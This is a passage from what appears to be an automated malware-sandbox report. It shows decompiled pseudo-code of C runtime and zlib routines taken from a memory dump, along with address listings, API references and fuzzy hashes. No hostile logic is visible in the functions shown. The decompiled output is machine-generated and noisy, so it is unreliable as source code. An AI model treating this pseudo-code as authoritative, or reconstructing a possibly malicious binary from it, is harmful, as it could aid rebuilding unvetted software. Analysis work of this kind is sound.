									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}

0x00417089
0x00417090
0x00417098
0x0041709a
0x004170a0
0x004170a6
0x004170bb
0x004170c5
0x004170cb
0x004170ce
0x004170d0
0x004170d0
0x004170bd
0x004170bd
0x004170bd
0x004170bb
0x004170dd
0x00417101
0x00417101
0x00417109
0x004172bb
0x004172be
0x004172c1
0x004172c4
0x004172cb
0x004172cb
0x004172ce
0x004172d1
0x004172d8
0x004172d8
0x004172de
0x004172e4
0x004172e7
0x004172ea
0x004172f3
0x004172f6
0x004173ef
0x004173f1
0x004173f1
0x004173f4
0x004173f6
0x004173f9
0x004173fe
0x004173ff
0x00417402
0x00417404
0x00417406
0x00417409
0x0041740b
0x0041740c
0x00417411
0x00417409
0x00417412
0x00000000
0x00417412
0x00417309
0x0041730e
0x00417311
0x00417314
0x00417316
0x00000000
0x00000000
0x0041732a
0x0041732c
0x0041732f
0x00417331
0x0041733a
0x00417379
0x00417379
0x00417379
0x0041737b
0x0041737b
0x0041737d
0x00000000
0x00000000
0x00417384
0x0041739c
0x0041739e
0x004173a1
0x004173a3
0x004173bf
0x004173c1
0x004173c9
0x004173cb
0x004173cb
0x004173a5
0x004173a5
0x004173a5
0x004173cf
0x00000000
0x004173d4
0x0041733c
0x0041733f
0x00000000
0x00000000
0x00417341
0x00417344
0x00417349
0x00417362
0x00417368
0x0041736a
0x0041736c
0x00417372
0x00417372
0x00417372
0x00417375
0x00000000
0x00417375
0x0041734b
0x00417350
0x00417352
0x00417354
0x00000000
0x00000000
0x00417356
0x0041735c
0x00000000
0x0041735c
0x00417333
0x00417333
0x00000000
0x00000000
0x00000000
0x00000000
0x00417117
0x0041711a
0x004172ec
0x004172ec
0x00417414
0x00417425
0x00417425
0x00417120
0x00417126
0x0041712d
0x0041712d
0x00417130
0x00417153
0x00417155
0x00417157
0x00000000
0x0041715d
0x0041715d
0x004171a2
0x004171a2
0x004171a5
0x004171a8
0x00000000
0x00000000
0x004171c1
0x004172aa
0x004172ad
0x004172b2
0x00000000
0x004172b5
0x004171c7
0x004171db
0x004171dd
0x004171e2
0x00000000
0x00000000
0x004171ef
0x0041721a
0x0041721c
0x00417263
0x00417263
0x00417263
0x00417265
0x00417265
0x00417267
0x00417277
0x0041727d
0x0041727f
0x00417281
0x00417282
0x00417283
0x00417286
0x0041728c
0x0041728f
0x00417288
0x00417288
0x00417289
0x00417289
0x004172a0
0x004172a0
0x004172a4
0x004172a9
0x00000000
0x00417267
0x00417222
0x00417223
0x00417225
0x00417228
0x00000000
0x00000000
0x0041722a
0x0041722a
0x0041722e
0x00417233
0x0041724c
0x00417252
0x00417254
0x00417256
0x0041725c
0x0041725c
0x0041725c
0x0041725f
0x00000000
0x0041725f
0x00417235
0x0041723a
0x0041723c
0x0041723e
0x00000000
0x00000000
0x00417240
0x00417246
0x00000000
0x00417246
0x004171f4
0x00417213
0x00417213
0x00000000
0x004171f4
0x00417163
0x00417164
0x00417169
0x00000000
0x00000000
0x0041716b
0x0041716b
0x00417174
0x0041718a
0x00417190
0x00417192
0x0041719d
0x0041719d
0x00000000
0x0041719d
0x00417194
0x0041719a
0x0041719a
0x00000000
0x0041719a
0x00417176
0x0041717b
0x0041717f
0x00000000
0x00000000
0x00417181
0x00000000
0x00417181
0x00417157
0x00417109
0x004170df
0x004170e2
0x004170e5
0x004170e5
0x004170e8
0x00000000
0x00000000
0x004170ea
0x004170ed
0x00000000
0x00000000
0x004170ef
0x00000000
0x004170ef
0x004170f7
0x004170fb
0x004170fd
0x004170fd
0x004170fe
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02561870), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: 4ffe8395f4efe6a765f21b4390be6f4af14092472717baba33cce7a441bd0c41
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: 4ffe8395f4efe6a765f21b4390be6f4af14092472717baba33cce7a441bd0c41
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004057B0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

0x004057b7
0x004057bf
0x004057c3
0x004057c5
0x004057cd
0x004059c8
0x004059ce
0x004057db
0x004057e3
0x004057e5
0x004057ea
0x00405921
0x0040592a
0x004057f0
0x004057f3
0x004057f6
0x004057f9
0x004057fc
0x004057ff
0x00405801
0x00405804
0x00405807
0x0040580a
0x0040580d
0x00405810
0x00405813
0x00405816
0x00405819
0x0040581c
0x00405824
0x00405827
0x0040582b
0x0040582e
0x00405831
0x00405834
0x00405837
0x00405837
0x00405839
0x0040583a
0x00405842
0x00405847
0x0040584a
0x0040584f
0x0040591c
0x0040591c
0x00000000
0x00405855
0x00405855
0x00405859
0x0040585b
0x00000000
0x00405870
0x00405872
0x00405874
0x00405874
0x00405877
0x0040587b
0x00405881
0x00405881
0x00405885
0x00405889
0x00405897
0x00405899
0x004058a5
0x004058a7
0x004058b3
0x004058b5
0x004058c1
0x004058c5
0x004058c7
0x004058c7
0x004058c8
0x004058b7
0x004058b7
0x004058b7
0x004058a9
0x004058a9
0x004058a9
0x0040589b
0x0040589b
0x0040589b
0x0040588f
0x00405892
0x00405892
0x004058cc
0x004058cf
0x00000000
0x00000000
0x004058d1
0x004058d9
0x00000000
0x00000000
0x004058db
0x004058db
0x004058e0
0x00000000
0x004058e2
0x004058e4
0x00405930
0x0040593f
0x00405942
0x00405944
0x00405949
0x0040594c
0x0040594e
0x00000000
0x00405950
0x00405950
0x00405953
0x00000000
0x00000000
0x00000000
0x00000000
0x00405953
0x004058e6
0x004058ea
0x004058ec
0x004058f1
0x004058f2
0x004058f4
0x004058f6
0x004058f8
0x004058f9
0x00405904
0x00405906
0x0040590b
0x0040590e
0x00405911
0x00405916
0x00000000
0x00405955
0x00405955
0x00405955
0x00405961
0x00405963
0x00405967
0x0040596d
0x0040596e
0x0040597c
0x0040597d
0x00405970
0x00405970
0x00405974
0x00405975
0x00405975
0x00405985
0x00405988
0x0040598a
0x00000000
0x0040598c
0x0040598c
0x00405990
0x004059a5
0x004059ad
0x004059b6
0x004059b6
0x004059b9
0x004059c5
0x00405992
0x00405992
0x004059a2
0x004059a2
0x00405990
0x0040598a
0x00405916
0x004058e4
0x00000000
0x00405860
0x00405860
0x00405862
0x00405864
0x00405865
0x00405868
0x00000000
0x0040586a
0x0040586a
0x0040586d
0x00000000
0x00405868
0x0040584f
0x004057ea
0x00000000

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCC2, Relevance: 10.7, APIs: 7, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}

0x0040bcc2
0x0040bcca
0x0040bcce
0x0040bcd3
0x0040bcd5
0x0040bcd8
0x0040bcde
0x0040bd01
0x00000000
0x0040bce5
0x0040bce5
0x0040bce7
0x0040bd08
0x0040bd0b
0x0040bd0d
0x0040bd1c
0x0040bd1c
0x0040bd1f
0x0040bd24
0x0040bd29
0x0040bd29
0x0040bd2c
0x0040bd2e
0x00000000
0x0040bd30
0x0040bd30
0x0040bd35
0x0040bd38
0x0040bd3b
0x00000000
0x00000000
0x0040bd3d
0x0040bd40
0x0040bd44
0x0040bd4b
0x0040bd4e
0x0040bd50
0x0040bd5a
0x0040bd52
0x0040bd55
0x0040bd55
0x0040bd61
0x0040bd63
0x0040be53
0x00000000
0x0040bd69
0x0040bd69
0x0040bd69
0x0040bd70
0x0040bdb6
0x0040bdb6
0x0040bdb9
0x0040be24
0x0040be2a
0x0040be2d
0x0040beb8
0x00000000
0x0040bebe
0x0040be33
0x0040be37
0x0040be87
0x0040be87
0x0040be8b
0x0040be95
0x0040be9a
0x0040be9a
0x0040bea2
0x0040beaa
0x0040beab
0x0040beac
0x0040bead
0x0040beae
0x0040bcf9
0x0040bcf9
0x00000000
0x0040bcfe
0x0040be39
0x0040be3c
0x0040be3f
0x0040be44
0x0040be45
0x0040be45
0x0040be45
0x0040be48
0x00000000
0x0040be48
0x0040bdbb
0x0040bdbf
0x0040bde0
0x0040bde5
0x0040bde7
0x0040bde9
0x0040bde9
0x0040bdc1
0x0040bdc8
0x0040bdca
0x0040bdd7
0x0040bdd7
0x0040bdd7
0x0040bdda
0x0040bdcc
0x0040bdce
0x0040bdd1
0x0040bdd1
0x0040bddc
0x0040bddc
0x0040bdeb
0x0040bdee
0x00000000
0x0040bdf4
0x0040bdf4
0x0040bdf5
0x0040bdf9
0x0040bdfe
0x0040bdff
0x0040be00
0x0040be05
0x0040be08
0x0040be0a
0x0040bec6
0x00000000
0x0040bec6
0x0040be10
0x0040be13
0x0040beb4
0x0040beb4
0x0040beb4
0x0040beb4
0x00000000
0x0040beb4
0x0040be19
0x0040be1c
0x0040be1e
0x00000000
0x0040be1e
0x0040bdee
0x0040bd72
0x0040bd75
0x0040bd77
0x00000000
0x00000000
0x0040bd79
0x00000000
0x00000000
0x0040bd7f
0x0040bd81
0x0040bd83
0x0040bd85
0x0040bd85
0x0040bd87
0x0040bd8a
0x0040be5b
0x0040be5d
0x0040be61
0x0040be6a
0x0040be6f
0x0040be6f
0x0040be72
0x0040be77
0x0040be78
0x0040be79
0x0040be7a
0x0040be7b
0x0040be81
0x00000000
0x0040bd90
0x0040bd99
0x0040bd9e
0x0040bda1
0x0040bda3
0x0040bda6
0x0040bda8
0x0040bdab
0x0040bdae
0x0040bdae
0x0040be4b
0x0040be4b
0x0040be4b
0x00000000
0x0040bd69
0x0040bd63
0x0040bd2e
0x0040bd0f
0x0040bd14
0x0040bd14
0x0040bd17
0x0040bd1a
0x00000000
0x00000000
0x00000000
0x0040bd1a
0x0040bce9
0x0040bce9
0x0040bcee
0x0040bcef
0x0040bcf0
0x0040bcf1
0x0040bcf2
0x0040bcf8
0x00000000
0x0040bcf8

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00414738, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
